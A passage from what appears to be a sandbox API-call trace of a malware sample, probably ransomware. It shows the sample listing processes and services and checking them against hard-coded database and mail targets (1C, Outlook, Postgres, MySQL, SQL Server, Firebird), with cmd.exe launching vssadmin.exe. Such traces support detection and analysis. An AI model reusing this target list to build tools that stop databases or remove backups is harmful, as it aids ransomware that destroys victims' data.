lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0043.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0043.715] lstrlenW (lpString="VSS") returned 3 [0043.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0043.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0043.715] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0043.715] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0043.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0043.715] lstrlenW (lpString="WdiServiceHost") returned 14 [0043.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0043.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0043.716] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0043.716] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0043.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0043.716] lstrlenW (lpString="WdiSystemHost") returned 13 [0043.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0043.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0043.716] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0043.716] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0043.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0043.716] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0043.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0043.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0043.716] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0043.716] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0043.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0043.716] lstrlenW (lpString="Winmgmt") returned 7 [0043.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0043.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0043.716] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0043.716] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0043.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0043.716] lstrlenW (lpString="WPDBusEnum") returned 10 [0043.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0043.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0043.716] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0043.716] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0043.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0043.716] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3800fb0 | out: hHeap=0x5f0000) returned 1 [0043.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0043.719] Process32FirstW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0043.720] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0043.720] lstrlenW (lpString="System") returned 6 [0043.720] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0043.720] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0043.720] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0043.720] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0043.720] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0043.721] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0043.721] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0043.721] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0043.721] lstrlenW (lpString="smss.exe") returned 8 [0043.721] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0043.721] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0043.721] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0043.721] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0043.721] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0043.721] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0043.721] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0043.721] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.722] lstrlenW (lpString="csrss.exe") returned 9 [0043.722] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0043.722] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0043.722] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0043.722] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0043.722] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0043.722] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0043.722] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0043.722] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0043.723] lstrlenW (lpString="wininit.exe") returned 11 [0043.723] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0043.723] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0043.723] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0043.723] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.724] lstrlenW (lpString="csrss.exe") returned 9 [0043.724] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0043.725] lstrlenW (lpString="winlogon.exe") returned 12 [0043.725] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0043.725] lstrlenW (lpString="services.exe") returned 12 [0043.725] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0043.726] lstrlenW (lpString="lsass.exe") returned 9 [0043.726] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0043.727] lstrlenW (lpString="lsm.exe") returned 7 [0043.727] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.728] lstrlenW (lpString="svchost.exe") returned 11 [0043.728] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.728] lstrlenW (lpString="svchost.exe") returned 11 [0043.728] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.729] lstrlenW (lpString="svchost.exe") returned 11 [0043.729] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.730] lstrlenW (lpString="svchost.exe") returned 11 [0043.730] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.730] lstrlenW (lpString="svchost.exe") returned 11 [0043.730] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0043.731] lstrlenW (lpString="audiodg.exe") returned 11 [0043.731] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.732] lstrlenW (lpString="svchost.exe") returned 11 [0043.732] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.732] lstrlenW (lpString="svchost.exe") returned 11 [0043.732] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0043.733] lstrlenW (lpString="dwm.exe") returned 7 [0043.733] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0043.734] lstrlenW (lpString="explorer.exe") returned 12 [0043.734] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0043.734] lstrlenW (lpString="spoolsv.exe") returned 11 [0043.734] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0043.735] lstrlenW (lpString="taskhost.exe") returned 12 [0043.735] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.736] lstrlenW (lpString="svchost.exe") returned 11 [0043.736] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0043.736] lstrlenW (lpString="taskeng.exe") returned 11 [0043.736] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0043.737] lstrlenW (lpString="taskhost.exe") returned 12 [0043.737] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0043.738] lstrlenW (lpString="entrepreneur.exe") returned 16 [0043.738] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0043.797] lstrlenW (lpString="andrew kinds.exe") returned 16 [0043.797] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0043.798] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0043.798] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0043.799] lstrlenW (lpString="educated.exe") returned 12 [0043.799] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0043.799] lstrlenW (lpString="servers.exe") returned 11 [0043.799] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0043.800] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0043.800] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0043.801] lstrlenW (lpString="gbp_chair.exe") returned 13 [0043.801] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0043.801] lstrlenW (lpString="attention infected.exe") returned 22 [0043.801] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0043.802] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0043.802] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0043.803] lstrlenW (lpString="pattern amateur.exe") returned 19 [0043.803] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0043.804] lstrlenW (lpString="referral.exe") returned 12 [0043.804] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0043.804] lstrlenW (lpString="copyingseems.exe") returned 16 [0043.804] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0043.805] lstrlenW (lpString="spin generally.exe") returned 18 [0043.805] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0043.805] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0043.806] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0043.806] lstrlenW (lpString="transmit.exe") returned 12 [0043.806] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0043.807] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0043.807] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0043.807] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0043.808] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0043.808] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0043.808] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0043.809] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0043.809] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0043.809] lstrlenW (lpString="delight.exe") returned 11 [0043.810] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0043.810] lstrlenW (lpString="within enquiry.exe") returned 18 [0043.810] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0043.811] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0043.811] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0043.812] lstrlenW (lpString="agent1c.exe") returned 11 [0043.812] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0043.812] lstrlenW (lpString="cmd.exe") returned 7 [0043.812] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0043.813] lstrlenW (lpString="conhost.exe") returned 11 [0043.813] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0043.813] lstrlenW (lpString="vssadmin.exe") returned 12 [0043.814] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0043.814] lstrlenW (lpString="VSSVC.exe") returned 9 [0043.814] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.815] lstrlenW (lpString="svchost.exe") returned 11 [0043.815] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0043.816] CloseHandle (hObject=0x170) returned 1 [0043.816] Sleep (dwMilliseconds=0x1f4) [0044.515] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3720470 [0044.515] EnumServicesStatusExW (in: hSCManager=0x3720470, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0044.515] GetLastError () returned 0xea [0044.515] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x3808fc0 [0044.516] EnumServicesStatusExW (in: hSCManager=0x3720470, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3808fc0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3808fc0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0044.516] CloseServiceHandle (hSCObject=0x3720470) returned 1 [0044.517] lstrlenW (lpString="Appinfo") returned 7 [0044.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0044.517] lstrcmpiW 